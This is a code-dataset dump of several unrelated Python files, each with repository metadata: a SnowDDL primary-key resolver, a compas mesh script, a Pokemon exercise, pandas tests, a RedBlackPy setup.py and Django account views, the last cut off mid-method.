snowddl/resolver/primary_key.py | littleK0i/SnowDDL | 21 | 8589 | <reponame>littleK0i/SnowDDL
from snowddl.blueprint import PrimaryKeyBlueprint
from snowddl.resolver.abc_schema_object_resolver import AbstractSchemaObjectResolver, ResolveResult, ObjectType
class PrimaryKeyResolver(AbstractSchemaObjectResolver):
def get_object_type(self) -> ObjectType:
return ObjectType.PRIMARY_KEY
def get_existing_objects_in_schema(self, schema: dict):
existing_objects = {}
constraints_by_name = {}
cur = self.engine.execute_meta("SHOW PRIMARY KEYS IN SCHEMA {database:i}.{schema:i}", {
"database": schema['database'],
"schema": schema['schema'],
})
for r in cur:
if r['constraint_name'] not in constraints_by_name:
constraints_by_name[r['constraint_name']] = {
"database": r['database_name'],
"schema": r['schema_name'],
"table": r['table_name'],
"columns": {r['key_sequence']: r['column_name']}
}
else:
constraints_by_name[r['constraint_name']]['columns'][r['key_sequence']] = r['column_name']
for c in constraints_by_name.values():
columns_list = [c['columns'][k] for k in sorted(c['columns'])]
full_name = f"{c['database']}.{c['schema']}.{c['table']}({','.join(columns_list)})"
existing_objects[full_name] = {
"database": c['database'],
"schema": c['schema'],
"table": c['table'],
"columns": columns_list,
}
return existing_objects
def get_blueprints(self):
return self.config.get_blueprints_by_type(PrimaryKeyBlueprint)
def create_object(self, bp: PrimaryKeyBlueprint):
self.engine.execute_safe_ddl("ALTER TABLE {table_name:i} ADD PRIMARY KEY ({columns:i})", {
"table_name": bp.table_name,
"columns": bp.columns,
})
return ResolveResult.CREATE
def compare_object(self, bp: PrimaryKeyBlueprint, row: dict):
if [str(c) for c in bp.columns] == row['columns']:
return ResolveResult.NOCHANGE
self.engine.execute_safe_ddl("ALTER TABLE {table_name:i} DROP PRIMARY KEY", {
"table_name": bp.table_name,
})
self.engine.execute_safe_ddl("ALTER TABLE {table_name:i} ADD PRIMARY KEY ({columns:i})", {
"table_name": bp.table_name,
"columns": bp.columns,
})
return ResolveResult.ALTER
def drop_object(self, row: dict):
self.engine.execute_safe_ddl("ALTER TABLE {database:i}.{schema:i}.{table:i} DROP PRIMARY KEY", {
"database": row['database'],
"schema": row['schema'],
"table": row['table'],
})
return ResolveResult.DROP
| from snowddl.blueprint import PrimaryKeyBlueprint
from snowddl.resolver.abc_schema_object_resolver import AbstractSchemaObjectResolver, ResolveResult, ObjectType
class PrimaryKeyResolver(AbstractSchemaObjectResolver):
def get_object_type(self) -> ObjectType:
return ObjectType.PRIMARY_KEY
def get_existing_objects_in_schema(self, schema: dict):
existing_objects = {}
constraints_by_name = {}
cur = self.engine.execute_meta("SHOW PRIMARY KEYS IN SCHEMA {database:i}.{schema:i}", {
"database": schema['database'],
"schema": schema['schema'],
})
for r in cur:
if r['constraint_name'] not in constraints_by_name:
constraints_by_name[r['constraint_name']] = {
"database": r['database_name'],
"schema": r['schema_name'],
"table": r['table_name'],
"columns": {r['key_sequence']: r['column_name']}
}
else:
constraints_by_name[r['constraint_name']]['columns'][r['key_sequence']] = r['column_name']
for c in constraints_by_name.values():
columns_list = [c['columns'][k] for k in sorted(c['columns'])]
full_name = f"{c['database']}.{c['schema']}.{c['table']}({','.join(columns_list)})"
existing_objects[full_name] = {
"database": c['database'],
"schema": c['schema'],
"table": c['table'],
"columns": columns_list,
}
return existing_objects
def get_blueprints(self):
return self.config.get_blueprints_by_type(PrimaryKeyBlueprint)
def create_object(self, bp: PrimaryKeyBlueprint):
self.engine.execute_safe_ddl("ALTER TABLE {table_name:i} ADD PRIMARY KEY ({columns:i})", {
"table_name": bp.table_name,
"columns": bp.columns,
})
return ResolveResult.CREATE
def compare_object(self, bp: PrimaryKeyBlueprint, row: dict):
if [str(c) for c in bp.columns] == row['columns']:
return ResolveResult.NOCHANGE
self.engine.execute_safe_ddl("ALTER TABLE {table_name:i} DROP PRIMARY KEY", {
"table_name": bp.table_name,
})
self.engine.execute_safe_ddl("ALTER TABLE {table_name:i} ADD PRIMARY KEY ({columns:i})", {
"table_name": bp.table_name,
"columns": bp.columns,
})
return ResolveResult.ALTER
def drop_object(self, row: dict):
self.engine.execute_safe_ddl("ALTER TABLE {database:i}.{schema:i}.{table:i} DROP PRIMARY KEY", {
"database": row['database'],
"schema": row['schema'],
"table": row['table'],
})
return ResolveResult.DROP | none | 1 | 2.32121 | 2 |
|
modules/module0/02_datastructures_and_geometry/datastructures_2b.py | tetov/ITA19 | 7 | 8590 | import os
import compas
from compas.datastructures import Mesh
from compas_rhino.artists import MeshArtist
HERE = os.path.dirname(__file__)
DATA = os.path.join(HERE, 'data')
FILE = os.path.join(DATA, 'faces.obj')
mesh = Mesh.from_obj(FILE)
artist = MeshArtist(mesh, layer="Mesh")
artist.draw_vertices(
color={key: (255, 0, 0) for key in mesh.vertices_on_boundary()})
artist.draw_vertexlabels(
text={key: str(mesh.vertex_degree(key)) for key in mesh.vertices()})
artist.draw_edges(
keys=list(mesh.edges_on_boundary()),
color=(255, 0, 0))
artist.draw_faces(
color={key: (150, 255, 150) for key in mesh.faces() if not mesh.is_face_on_boundary(key)})
| import os
import compas
from compas.datastructures import Mesh
from compas_rhino.artists import MeshArtist
HERE = os.path.dirname(__file__)
DATA = os.path.join(HERE, 'data')
FILE = os.path.join(DATA, 'faces.obj')
mesh = Mesh.from_obj(FILE)
artist = MeshArtist(mesh, layer="Mesh")
artist.draw_vertices(
color={key: (255, 0, 0) for key in mesh.vertices_on_boundary()})
artist.draw_vertexlabels(
text={key: str(mesh.vertex_degree(key)) for key in mesh.vertices()})
artist.draw_edges(
keys=list(mesh.edges_on_boundary()),
color=(255, 0, 0))
artist.draw_faces(
color={key: (150, 255, 150) for key in mesh.faces() if not mesh.is_face_on_boundary(key)})
| none | 1 | 2.585056 | 3 |
|
OOP/Exercises/First_steps_in_OOP_Exercises/8_pokemon/project/pokemon.py | tankishev/Python | 2 | 8591 | <reponame>tankishev/Python<filename>OOP/Exercises/First_steps_in_OOP_Exercises/8_pokemon/project/pokemon.py<gh_stars>1-10
# The Pokemon class should receive a name (string) and health (int) upon initialization.
# It should also have a method called pokemon_details that returns the information about the pokemon:
# "{pokemon_name} with health {pokemon_health}"
class Pokemon:
def __init__(self, name: str, health: int) -> None:
self.name = name
self.health = health
def pokemon_details(self) -> str:
return f"{self.name} with health {self.health}"
| # The Pokemon class should receive a name (string) and health (int) upon initialization.
# It should also have a method called pokemon_details that returns the information about the pokemon:
# "{pokemon_name} with health {pokemon_health}"
class Pokemon:
def __init__(self, name: str, health: int) -> None:
self.name = name
self.health = health
def pokemon_details(self) -> str:
return f"{self.name} with health {self.health}" | en | 0.927727 | # The Pokemon class should receive a name (string) and health (int) upon initialization. # It should also have a method called pokemon_details that returns the information about the pokemon: # "{pokemon_name} with health {pokemon_health}" | 3.724721 | 4 |
tests/test_pandas.py | ONSdigital/ons_utils | 0 | 8592 | """Tests for the pandas helpers in the pd_helpers.py module."""
import pytest
from pandas.testing import assert_frame_equal
from tests.conftest import create_dataframe
from ons_utils.pandas import *
def test_nested_dict_to_df():
"""Test for nested_dict_to_df."""
input_d = {
'bones': {
'femur': {'tendons': 24},
'humerus': {'tendons': 14},
},
'muscles': {
'gluteus_maximus': {'tendons': 18},
},
'cars': 7,
}
actual = nested_dict_to_df(
input_d,
columns=['number'],
level_names=('a', 'b', 'c'),
)
expected = create_dataframe([
('a', 'b', 'c', 'number'),
('bones', 'femur', 'tendons', 24),
('bones', 'humerus', 'tendons', 14),
('cars', None, None, 7),
('muscles', 'gluteus_maximus', 'tendons', 18),
])
assert_frame_equal(
# Sort values as dict order not preserved.
actual.sort_values(['a', 'b']),
# Set index because function returns a MultiIndex.
expected.set_index(['a', 'b', 'c'])
)
class TestStacker:
"""Group of tests for Stacker."""
@pytest.mark.skip(reason="test shell")
def test_Stacker(self):
"""Test for Stacker."""
pass
@pytest.mark.skip(reason="test shell")
def test_convert_level_to_datetime():
"""Test for this."""
pass
class TestMultiIndexSlicer:
"""Group of tests for MultiIndexSlicer."""
@pytest.mark.skip(reason="test shell")
def test_MultiIndexSlicer(self):
"""Test for MultiIndexSlicer."""
pass
@pytest.mark.skip(reason="test shell")
def test_get_index_level_values():
"""Test for this."""
pass
@pytest.mark.skip(reason="test shell")
def test_shifted_within_year_apply():
"""Test for this."""
pass
@pytest.mark.skip(reason="test shell")
def test_shifted_within_year_ffill():
"""Test for this."""
pass
| """Tests for the pandas helpers in the pd_helpers.py module."""
import pytest
from pandas.testing import assert_frame_equal
from tests.conftest import create_dataframe
from ons_utils.pandas import *
def test_nested_dict_to_df():
"""Test for nested_dict_to_df."""
input_d = {
'bones': {
'femur': {'tendons': 24},
'humerus': {'tendons': 14},
},
'muscles': {
'gluteus_maximus': {'tendons': 18},
},
'cars': 7,
}
actual = nested_dict_to_df(
input_d,
columns=['number'],
level_names=('a', 'b', 'c'),
)
expected = create_dataframe([
('a', 'b', 'c', 'number'),
('bones', 'femur', 'tendons', 24),
('bones', 'humerus', 'tendons', 14),
('cars', None, None, 7),
('muscles', 'gluteus_maximus', 'tendons', 18),
])
assert_frame_equal(
# Sort values as dict order not preserved.
actual.sort_values(['a', 'b']),
# Set index because function returns a MultiIndex.
expected.set_index(['a', 'b', 'c'])
)
class TestStacker:
"""Group of tests for Stacker."""
@pytest.mark.skip(reason="test shell")
def test_Stacker(self):
"""Test for Stacker."""
pass
@pytest.mark.skip(reason="test shell")
def test_convert_level_to_datetime():
"""Test for this."""
pass
class TestMultiIndexSlicer:
"""Group of tests for MultiIndexSlicer."""
@pytest.mark.skip(reason="test shell")
def test_MultiIndexSlicer(self):
"""Test for MultiIndexSlicer."""
pass
@pytest.mark.skip(reason="test shell")
def test_get_index_level_values():
"""Test for this."""
pass
@pytest.mark.skip(reason="test shell")
def test_shifted_within_year_apply():
"""Test for this."""
pass
@pytest.mark.skip(reason="test shell")
def test_shifted_within_year_ffill():
"""Test for this."""
pass
| en | 0.774217 | Tests for the pandas helpers in the pd_helpers.py module. Test for nested_dict_to_df. # Sort values as dict order not preserved. # Set index because function returns a MultiIndex. Group of tests for Stacker. Test for Stacker. Test for this. Group of tests for MultiIndexSlicer. Test for MultiIndexSlicer. Test for this. Test for this. Test for this. | 2.988523 | 3 |
lsf_ibutils/ibsub/__init__.py | seanfisk/lsf-ibutils | 0 | 8593 | <filename>lsf_ibutils/ibsub/__init__.py
""":mod:`lsf_ibutils.ibsub` -- Interactive batch submission utility
"""
| <filename>lsf_ibutils/ibsub/__init__.py
""":mod:`lsf_ibutils.ibsub` -- Interactive batch submission utility
"""
| en | 0.550865 | :mod:`lsf_ibutils.ibsub` -- Interactive batch submission utility | 1.08001 | 1 |
build/lib/configger/fishes/__init__.py | PaperDevil/pyconfigger | 2 | 8594 | <reponame>PaperDevil/pyconfigger<gh_stars>1-10
import os
splited_path = os.path.realpath(__file__).split('\\')[:-1]
fish_path = '\\'.join(splited_path)
fish_json_name = "fish.json"
fish_json_path = os.path.join(fish_path, fish_json_name)
| import os
splited_path = os.path.realpath(__file__).split('\\')[:-1]
fish_path = '\\'.join(splited_path)
fish_json_name = "fish.json"
fish_json_path = os.path.join(fish_path, fish_json_name) | none | 1 | 2.107305 | 2 |
|
setup.py | IntuitionEngineeringTeam/RedBlackPy | 12 | 8595 | #
# Created by <NAME>.
# Copyright 2018 Intuition. All rights reserved.
#
import os
import platform
from setuptools import setup
from setuptools.command.build_ext import build_ext
from distutils.extension import Extension
from Cython.Build import cythonize
from rbp_setup_tools.code_generation import generate_from_cython_src
from rbp_setup_tools.types import TYPES
if platform.system() == 'Darwin':
compile_opts = [ '-std=c++11',
'-mmacosx-version-min={:}'.format( platform.mac_ver()[0] ),
'-Ofast' ]
elif platform.system() == 'Linux':
compile_opts = [ '-std=c++11',
'-Ofast' ]
elif platform.system() == 'Windows':
compile_opts = [ '-std=c++11',
'-Ofast' ]
else:
raise EnvironmentError( 'Not supported platform: {plat}'.format(plat=platform.system()) )
#--------------------------------------------------------------------------------------------
# Generate cython code for all supporting types
#--------------------------------------------------------------------------------------------
src_1 = './redblackpy/cython_source/__dtype_tree_processing.pxi'
src_2 = './redblackpy/cython_source/__tree_series_dtype.pxi'
src_3 = './redblackpy/cython_source/__interpolation.pxi'
src_4 = './redblackpy/cython_source/__arithmetic.pxi'
src_1 = open(src_1, 'r')
src_2 = open(src_2, 'r')
src_3 = open(src_3, 'r')
src_4 = open(src_4, 'r')
output_1 = open('./redblackpy/cython_source/dtype_tree_processing.pxi', 'w')
output_2 = open('./redblackpy/cython_source/tree_series_dtype.pxi', 'w')
output_3 = open('./redblackpy/cython_source/interpolation.pxi', 'w')
output_4 = open('./redblackpy/cython_source/arithmetic.pxi', 'w')
generate_from_cython_src(src_1, output_1, TYPES[:-1], 0)
generate_from_cython_src(src_2, output_2, TYPES, 14)
generate_from_cython_src(src_3, output_3, TYPES, 0)
generate_from_cython_src(src_4, output_4, TYPES, 0)
src_1.close()
src_2.close()
src_3.close()
src_4.close()
output_1.close()
output_2.close()
output_3.close()
output_4.close()
#--------------------------------------------------------------------------------------------
ext_modules=[ Extension( "redblackpy.series.tree_series",
sources=["redblackpy/series/tree_series.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'],
depends=[ 'core/tree/tree.hpp',
'core/tree/rb_tree.tpp'
'core/tree/rb_node.tpp',
'core/tree/rb_node_valued.tpp',
'core/trees_iterator/iterator.hpp',
'core/trees_iterator/iterator.tpp' ], ),
Extension( "redblackpy.series.series_iterator",
sources=["redblackpy/series/series_iterator.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'],
depends=[ 'core/tree/tree.hpp',
'core/tree/rb_tree.tpp'
'core/tree/rb_node.tpp',
'core/tree/rb_node_valued.tpp',
'core/trees_iterator/iterator.hpp',
'core/trees_iterator/iterator.tpp' ], ),
Extension( "redblackpy.benchmark.timer",
sources=["redblackpy/benchmark/timer.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'] ) ]
setup( name='redblackpy',
ext_modules = cythonize(ext_modules),
version='0.1.3.0',
author='<NAME>',
author_email='<EMAIL>',
maintainer='Intuition',
maintainer_email='<EMAIL>',
install_requires=['cython'],
description='Data structures based on red-black trees.',
url='https://intuitionengineeringteam.github.io/RedBlackPy/',
download_url='https://github.com/IntuitionEngineeringTeam/RedBlackPy/archive/master.zip',
zip_safe=False,
packages=[ 'redblackpy', 'redblackpy.series',
'redblackpy.benchmark', 'redblackpy.tree_cython_api'],
package_data={'redblackpy.series': ['*.pxd']},
include_package_data=True,
license='Apache License 2.0',
long_description='RedBlackPy is a light Python library that provides data structures \
aimed to fast insertion, removal and self sorting to manipulating ordered data in efficient way.\
The core part of the library had been written on C++ and then was wrapped in Cython. \
Hope that many would find the primary data structures of this library very handy in working \
with time series. One of the main feature of this structures is an access by arbitrary \
key using interpolation, what makes processing of multiple non synchronized time series very simple.\
All data structures based on red black trees.',
classifiers = [ 'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3' ] )
| #
# Created by <NAME>.
# Copyright 2018 Intuition. All rights reserved.
#
import os
import platform
from setuptools import setup
from setuptools.command.build_ext import build_ext
from distutils.extension import Extension
from Cython.Build import cythonize
from rbp_setup_tools.code_generation import generate_from_cython_src
from rbp_setup_tools.types import TYPES
if platform.system() == 'Darwin':
compile_opts = [ '-std=c++11',
'-mmacosx-version-min={:}'.format( platform.mac_ver()[0] ),
'-Ofast' ]
elif platform.system() == 'Linux':
compile_opts = [ '-std=c++11',
'-Ofast' ]
elif platform.system() == 'Windows':
compile_opts = [ '-std=c++11',
'-Ofast' ]
else:
raise EnvironmentError( 'Not supported platform: {plat}'.format(plat=platform.system()) )
#--------------------------------------------------------------------------------------------
# Generate cython code for all supporting types
#--------------------------------------------------------------------------------------------
src_1 = './redblackpy/cython_source/__dtype_tree_processing.pxi'
src_2 = './redblackpy/cython_source/__tree_series_dtype.pxi'
src_3 = './redblackpy/cython_source/__interpolation.pxi'
src_4 = './redblackpy/cython_source/__arithmetic.pxi'
src_1 = open(src_1, 'r')
src_2 = open(src_2, 'r')
src_3 = open(src_3, 'r')
src_4 = open(src_4, 'r')
output_1 = open('./redblackpy/cython_source/dtype_tree_processing.pxi', 'w')
output_2 = open('./redblackpy/cython_source/tree_series_dtype.pxi', 'w')
output_3 = open('./redblackpy/cython_source/interpolation.pxi', 'w')
output_4 = open('./redblackpy/cython_source/arithmetic.pxi', 'w')
generate_from_cython_src(src_1, output_1, TYPES[:-1], 0)
generate_from_cython_src(src_2, output_2, TYPES, 14)
generate_from_cython_src(src_3, output_3, TYPES, 0)
generate_from_cython_src(src_4, output_4, TYPES, 0)
src_1.close()
src_2.close()
src_3.close()
src_4.close()
output_1.close()
output_2.close()
output_3.close()
output_4.close()
#--------------------------------------------------------------------------------------------
ext_modules=[ Extension( "redblackpy.series.tree_series",
sources=["redblackpy/series/tree_series.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'],
depends=[ 'core/tree/tree.hpp',
'core/tree/rb_tree.tpp'
'core/tree/rb_node.tpp',
'core/tree/rb_node_valued.tpp',
'core/trees_iterator/iterator.hpp',
'core/trees_iterator/iterator.tpp' ], ),
Extension( "redblackpy.series.series_iterator",
sources=["redblackpy/series/series_iterator.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'],
depends=[ 'core/tree/tree.hpp',
'core/tree/rb_tree.tpp'
'core/tree/rb_node.tpp',
'core/tree/rb_node_valued.tpp',
'core/trees_iterator/iterator.hpp',
'core/trees_iterator/iterator.tpp' ], ),
Extension( "redblackpy.benchmark.timer",
sources=["redblackpy/benchmark/timer.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'] ) ]
setup( name='redblackpy',
ext_modules = cythonize(ext_modules),
version='0.1.3.0',
author='<NAME>',
author_email='<EMAIL>',
maintainer='Intuition',
maintainer_email='<EMAIL>',
install_requires=['cython'],
description='Data structures based on red-black trees.',
url='https://intuitionengineeringteam.github.io/RedBlackPy/',
download_url='https://github.com/IntuitionEngineeringTeam/RedBlackPy/archive/master.zip',
zip_safe=False,
packages=[ 'redblackpy', 'redblackpy.series',
'redblackpy.benchmark', 'redblackpy.tree_cython_api'],
package_data={'redblackpy.series': ['*.pxd']},
include_package_data=True,
license='Apache License 2.0',
long_description='RedBlackPy is a light Python library that provides data structures \
aimed to fast insertion, removal and self sorting to manipulating ordered data in efficient way.\
The core part of the library had been written on C++ and then was wrapped in Cython. \
Hope that many would find the primary data structures of this library very handy in working \
with time series. One of the main feature of this structures is an access by arbitrary \
key using interpolation, what makes processing of multiple non synchronized time series very simple.\
All data structures based on red black trees.',
classifiers = [ 'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3' ] )
| en | 0.248138 | # # Created by <NAME>. # Copyright 2018 Intuition. All rights reserved. # #-------------------------------------------------------------------------------------------- # Generate cython code for all supporting types #-------------------------------------------------------------------------------------------- #-------------------------------------------------------------------------------------------- | 1.782742 | 2 |
source/accounts/views.py | kishan2064/hashpy1 | 0 | 8596 | from django.contrib.auth import login, authenticate, REDIRECT_FIELD_NAME, get_user_model
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.views import PasswordResetView as BasePasswordResetView, SuccessURLAllowedHostsMixin
from django.shortcuts import get_object_or_404, resolve_url
from django.utils.crypto import get_random_string
from django.utils.decorators import method_decorator
from django.utils.http import is_safe_url
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.debug import sensitive_post_parameters
from django.utils.translation import gettext_lazy as _
from django.views.generic import RedirectView
from django.views.generic.edit import FormView
from django.conf import settings
from .utils import (
get_login_form, send_activation_email, get_password_reset_form, send_reset_password_email,
send_activation_change_email, is_username_disabled, get_resend_ac_form
)
from .forms import SignUpForm, ProfileEditForm, ChangeEmailForm
from .models import Activation
UserModel = get_user_model()
class SuccessRedirectView(SuccessURLAllowedHostsMixin, FormView):
redirect_field_name = REDIRECT_FIELD_NAME
def get_success_url(self):
url = self.get_redirect_url()
return url or resolve_url(settings.LOGIN_REDIRECT_URL)
def get_redirect_url(self):
redirect_to = self.request.POST.get(
self.redirect_field_name,
self.request.GET.get(self.redirect_field_name, '')
)
url_is_safe = is_safe_url(
url=redirect_to,
allowed_hosts=self.get_success_url_allowed_hosts(),
require_https=self.request.is_secure(),
)
return redirect_to if url_is_safe else ''
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['request'] = self.request
return kwargs
class SignInView(SuccessRedirectView):
template_name = 'accounts/login.html'
form_class = get_login_form()
success_url = '/'
@method_decorator(sensitive_post_parameters('password'))
@method_decorator(csrf_protect)
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
# Sets a test cookie to make sure the user has cookies enabled
request.session.set_test_cookie()
return super(SignInView, self).dispatch(request, *args, **kwargs)
def form_valid(self, form):
# If the test cookie worked, go ahead and
# delete it since its no longer needed
if self.request.session.test_cookie_worked():
self.request.session.delete_test_cookie()
login(self.request, form.get_user())
return super(SignInView, self).form_valid(form)
class SignUpView(FormView):
template_name = 'accounts/register.html'
form_class = SignUpForm
success_url = '/'
def form_valid(self, form):
user = form.save(commit=False)
if is_username_disabled():
# Set temporary username
user.username = get_random_string()
else:
user.username = form.cleaned_data.get('username')
if settings.ENABLE_USER_ACTIVATION:
user.is_active = False
user.save()
# Change the username to "user_ID" form
if is_username_disabled():
user.username = 'user_{}'.format(user.id)
user.save()
if settings.ENABLE_USER_ACTIVATION:
send_activation_email(self.request, user)
messages.add_message(self.request, messages.SUCCESS,
_('You are registered. To activate the account, follow the link sent to the mail.'))
else:
raw_password = form.cleaned_data.get('<PASSWORD>')
user = authenticate(username=user.username, password=<PASSWORD>)
login(self.request, user)
messages.add_message(self.request, messages.SUCCESS, _('You are successfully registered!'))
return super(SignUpView, self).form_valid(form)
class ActivateView(RedirectView):
permanent = False
query_string = True
pattern_name = 'index'
def get_redirect_url(self, *args, **kwargs):
assert 'code' in kwargs
act = get_object_or_404(Activation, code=kwargs['code'])
# Activate user's profile
user = act.user
user.is_active = True
user.save()
# Remove activation record, it is unneeded
act.delete()
messages.add_message(self.request, messages.SUCCESS, _('You have successfully activated your account!'))
login(self.request, user)
return super(ActivateView, self).get_redirect_url()
class ReSendActivationCodeView(SuccessRedirectView):
template_name = 'accounts/resend_activation_code.html'
form_class = get_resend_ac_form()
success_url = '/'
def form_valid(self, form):
user = form.get_user()
activation = user.activation_set.get()
activation.delete()
send_activation_email(self.request, user)
messages.add_message(self.request, messages.SUCCESS, _('A new activation code has been sent to your e-mail.'))
return super(ReSendActivationCodeView, self).form_valid(form)
class PasswordResetView(BasePasswordResetView):
form_class = get_password_reset_form()
def form_valid(self, form):
send_reset_password_email(self.request, form.get_user())
return super(PasswordResetView, self).form_valid(form)
class ProfileEditView(LoginRequiredMixin, FormView):
template_name = 'accounts/profile/edit.html'
form_class = ProfileEditForm
success_url = '/accounts/profile/edit/'
def get_initial(self):
initial = super(ProfileEditView, self).get_initial()
user = self.request.user
initial['first_name'] = user.first_name
initial['last_name'] = user.last_name
return initial
def form_valid(self, form):
user = self.request.user
user.first_name = form.cleaned_data.get('first_name')
user.last_name = form.cleaned_data.get('last_name')
user.save()
messages.add_message(self.request, messages.SUCCESS, _('Profile data has been successfully updated.'))
return super(ProfileEditView, self).form_valid(form)
class ChangeEmailView(LoginRequiredMixin, FormView):
template_name = 'accounts/profile/change_email.html'
form_class = ChangeEmailForm
success_url = '/accounts/change/email/'
def get_form_kwargs(self):
kwargs = super(ChangeEmailView, self).get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
def get_initial(self):
initial = super(ChangeEmailView, self).get_initial()
user = self.request.user
initial['email'] = user.email
return initial
def form_valid(self, form):
user = self.request.user
email = form.cleaned_data.get('email')
email = email.lower()
if hasattr(settings, 'EMAIL_ACTIVATION_AFTER_CHANGING') and settings.EMAIL_ACTIVATION_AFTER_CHANGING:
send_activation_change_email(self.request, user, email)
messages.add_message(self.request, messages.SUCCESS,
_('To complete the change of mail, click on the link sent to it.'))
else:
user.email = email
user.save()
messages.add_message(self.request, messages.SUCCESS, _('Email successfully changed.'))
return super(ChangeEmailView, self).form_valid(form)
class ChangeEmailActivateView(RedirectView):
permanent = False
query_string = True
pattern_name = 'change_email'
def get_redirect_url(self, *args, **kwargs):
assert 'code' in kwargs
act = get_object_or_404(Activation, code=kwargs['code'])
# Change user's email
user = act.user
user.email = act.email
user.save()
# Remove activation record, it is unneeded
act.delete()
messages.add_message(self.request, messages.SUCCESS, _('You have successfully changed your email!'))
return super(ChangeEmailActivateView, self).get_redirect_url()
| from django.contrib.auth import login, authenticate, REDIRECT_FIELD_NAME, get_user_model
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.views import PasswordResetView as BasePasswordResetView, SuccessURLAllowedHostsMixin
from django.shortcuts import get_object_or_404, resolve_url
from django.utils.crypto import get_random_string
from django.utils.decorators import method_decorator
from django.utils.http import is_safe_url
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.debug import sensitive_post_parameters
from django.utils.translation import gettext_lazy as _
from django.views.generic import RedirectView
from django.views.generic.edit import FormView
from django.conf import settings
from .utils import (
get_login_form, send_activation_email, get_password_reset_form, send_reset_password_email,
send_activation_change_email, is_username_disabled, get_resend_ac_form
)
from .forms import SignUpForm, ProfileEditForm, ChangeEmailForm
from .models import Activation
UserModel = get_user_model()
class SuccessRedirectView(SuccessURLAllowedHostsMixin, FormView):
redirect_field_name = REDIRECT_FIELD_NAME
def get_success_url(self):
url = self.get_redirect_url()
return url or resolve_url(settings.LOGIN_REDIRECT_URL)
def get_redirect_url(self):
redirect_to = self.request.POST.get(
self.redirect_field_name,
self.request.GET.get(self.redirect_field_name, '')
)
url_is_safe = is_safe_url(
url=redirect_to,
allowed_hosts=self.get_success_url_allowed_hosts(),
require_https=self.request.is_secure(),
)
return redirect_to if url_is_safe else ''
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['request'] = self.request
return kwargs
class SignInView(SuccessRedirectView):
template_name = 'accounts/login.html'
form_class = get_login_form()
success_url = '/'
@method_decorator(sensitive_post_parameters('password'))
@method_decorator(csrf_protect)
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
# Sets a test cookie to make sure the user has cookies enabled
request.session.set_test_cookie()
return super(SignInView, self).dispatch(request, *args, **kwargs)
def form_valid(self, form):
# If the test cookie worked, go ahead and
# delete it since its no longer needed
if self.request.session.test_cookie_worked():
self.request.session.delete_test_cookie()
login(self.request, form.get_user())
return super(SignInView, self).form_valid(form)
class SignUpView(FormView):
template_name = 'accounts/register.html'
form_class = SignUpForm
success_url = '/'
def form_valid(self, form):
user = form.save(commit=False)
if is_username_disabled():
# Set temporary username
user.username = get_random_string()
else:
user.username = form.cleaned_data.get('username')
if settings.ENABLE_USER_ACTIVATION:
user.is_active = False
user.save()
# Change the username to "user_ID" form
if is_username_disabled():
user.username = 'user_{}'.format(user.id)
user.save()
if settings.ENABLE_USER_ACTIVATION:
send_activation_email(self.request, user)
messages.add_message(self.request, messages.SUCCESS,
_('You are registered. To activate the account, follow the link sent to the mail.'))
else:
raw_password = form.cleaned_data.get('<PASSWORD>')
user = authenticate(username=user.username, password=<PASSWORD>)
login(self.request, user)
messages.add_message(self.request, messages.SUCCESS, _('You are successfully registered!'))
return super(SignUpView, self).form_valid(form)
class ActivateView(RedirectView):
permanent = False
query_string = True
pattern_name = 'index'
def get_redirect_url(self, *args, **kwargs):
assert 'code' in kwargs
act = get_object_or_404(Activation, code=kwargs['code'])
# Activate user's profile
user = act.user
user.is_active = True
user.save()
# Remove activation record, it is unneeded
act.delete()
messages.add_message(self.request, messages.SUCCESS, _('You have successfully activated your account!'))
login(self.request, user)
return super(ActivateView, self).get_redirect_url()
class ReSendActivationCodeView(SuccessRedirectView):
template_name = 'accounts/resend_activation_code.html'
form_class = get_resend_ac_form()
success_url = '/'
def form_valid(self, form):
user = form.get_user()
activation = user.activation_set.get()
activation.delete()
send_activation_email(self.request, user)
messages.add_message(self.request, messages.SUCCESS, _('A new activation code has been sent to your e-mail.'))
return super(ReSendActivationCodeView, self).form_valid(form)
class PasswordResetView(BasePasswordResetView):
form_class = get_password_reset_form()
def form_valid(self, form):
send_reset_password_email(self.request, form.get_user())
return super(PasswordResetView, self).form_valid(form)
class ProfileEditView(LoginRequiredMixin, FormView):
template_name = 'accounts/profile/edit.html'
form_class = ProfileEditForm
success_url = '/accounts/profile/edit/'
def get_initial(self):
initial = super(ProfileEditView, self).get_initial()
user = self.request.user
initial['first_name'] = user.first_name
initial['last_name'] = user.last_name
return initial
def form_valid(self, form):
user = self.request.user
user.first_name = form.cleaned_data.get('first_name')
user.last_name = form.cleaned_data.get('last_name')
user.save()
messages.add_message(self.request, messages.SUCCESS, _('Profile data has been successfully updated.'))
return super(ProfileEditView, self).form_valid(form)
class ChangeEmailView(LoginRequiredMixin, FormView):
template_name = 'accounts/profile/change_email.html'
form_class = ChangeEmailForm
success_url = '/accounts/change/email/'
def get_form_kwargs(self):
kwargs = super(ChangeEmailView, self).get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
def get_initial(self):
initial = super(ChangeEmailView, self).get_initial()
user = self.request.user
initial['email'] = user.email
return initial
def form_valid(self, form):
user = self.request.user
email = form.cleaned_data.get('email')
email = email.lower()
